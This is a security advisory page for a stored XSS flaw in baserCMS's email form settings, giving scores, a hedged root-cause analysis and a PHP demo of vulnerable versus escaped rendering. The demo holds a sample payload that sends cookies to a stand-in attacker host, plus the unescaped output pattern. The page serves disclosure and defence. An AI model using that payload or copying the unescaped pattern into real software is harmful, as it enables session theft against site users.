
CVE-2024-46998:
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature

CVSS 3.1 Score: 7.1

Basic Information

EPSS Score: 0.28185%
Published: 10/24/2024
Updated: 10/28/2024
KEV Status: No
Technology: PHP

Technical Details

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Package Name            Ecosystem   Vulnerable Versions   First Patched Version
baserproject/basercms   composer    <= 5.1.1              5.1.2

Vulnerability Intelligence

Miggo AI Root Cause Analysis

The vulnerability is a stored XSS in the Edit Email Form Settings feature. Stored XSS of this kind arises when user-supplied input is written into a page without output escaping; validating input at save time is only defence in depth. baserCMS is built on CakePHP, an MVC framework in which controllers process request input and view templates render it. The edit action in EmailFormSettingsController likely accepts a settings field and saves it without validation, and the associated view template (edit.ctp) likely echoes the stored value without CakePHP's escaping helper, i.e. it emits `<?= $field ?>` where `<?= h($field) ?>` is required. The CVSS vector is consistent with this: a low-privileged authenticated user (PR:L) stores the payload, and it executes with no further interaction (UI:N) whenever another user opens the settings screen. The high confidence in the view template stems from the prevalence of XSS via unescaped output in similar CMS systems; the medium confidence in the controller reflects uncertainty about its input-validation practices, since the patch details have not been analysed.
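The template pattern described above, as an added standalone PHP example that is not code from this page or from baserCMS: one constructed mail-form setting is rendered once without escaping and once through `h()`. `h()` is CakePHP's real escaping helper, but the script defines an equivalent with the same `htmlspecialchars` semantics so it runs outside the framework. The field names, the `renderVulnerable`/`renderSafe` functions, the `containsScriptTag` check and the payload are all constructed for illustration and are not taken from baserCMS.

```php
<?php
// Added example, not baserCMS code. Runs standalone: `h()` is defined here
// with the semantics CakePHP's helper has (htmlspecialchars with ENT_QUOTES)
// so the script works outside the framework.
declare(strict_types=1);

if (!function_exists('h')) {
    function h(?string $text): string
    {
        return htmlspecialchars((string)$text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed sample: a mail-form setting saved by a low-privileged editor
// (CVSS PR:L) whose "name" field carries a script payload. Field names are
// hypothetical.
$setting = [
    'name'    => 'Contact <script>document.location="https://attacker.example/?c="+document.cookie</script>',
    'subject' => 'Thanks for contacting "us"',
];

// Vulnerable rendering: the stored value is concatenated into the markup
// unescaped, so the browser runs the payload whenever someone opens the
// edit screen (stored XSS). This is the pattern the root-cause analysis
// suspects in the edit template.
function renderVulnerable(array $setting): string
{
    return '<input type="text" name="name" value="' . $setting['name'] . '">' . "\n"
         . '<input type="text" name="subject" value="' . $setting['subject'] . '">';
}

// Hardened rendering: every untrusted value passes through h() at output
// time. With ENT_QUOTES both " and ' are encoded, so the value can neither
// close the attribute nor open a tag, regardless of what was stored.
function renderSafe(array $setting): string
{
    return '<input type="text" name="name" value="' . h($setting['name']) . '">' . "\n"
         . '<input type="text" name="subject" value="' . h($setting['subject']) . '">';
}

// Constructed regression check: does the rendered HTML still contain an
// executable <script> tag? The escaped output only contains &lt;script&gt;.
function containsScriptTag(string $html): bool
{
    return (bool)preg_match('/<script\b/i', $html);
}

echo "--- vulnerable ---\n" . renderVulnerable($setting) . "\n";
echo "--- escaped ---\n" . renderSafe($setting) . "\n";
var_dump(containsScriptTag(renderVulnerable($setting)));
var_dump(containsScriptTag(renderSafe($setting)));
```

Run it with `php example.php`; in the escaped output the payload survives only as literal text inside the attribute. In real CakePHP templates the FormHelper methods such as `$this->Form->control()` escape attribute values by default, so the unsafe pattern normally comes from echoing a raw variable in the template or from passing `'escape' => false`, which is what a reviewer of the edit template should look for.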


WAF Protection Rules

WAF Rule

XSS vulnerability in the Edit Email Form Settings feature of baserCMS.

### Target
baserCMS 5.1.1 and earlier versions

### Vulnerability
Malicious code may be executed in the Edit Email Form Settings feature.

### Countermeasures
Update to the latest version
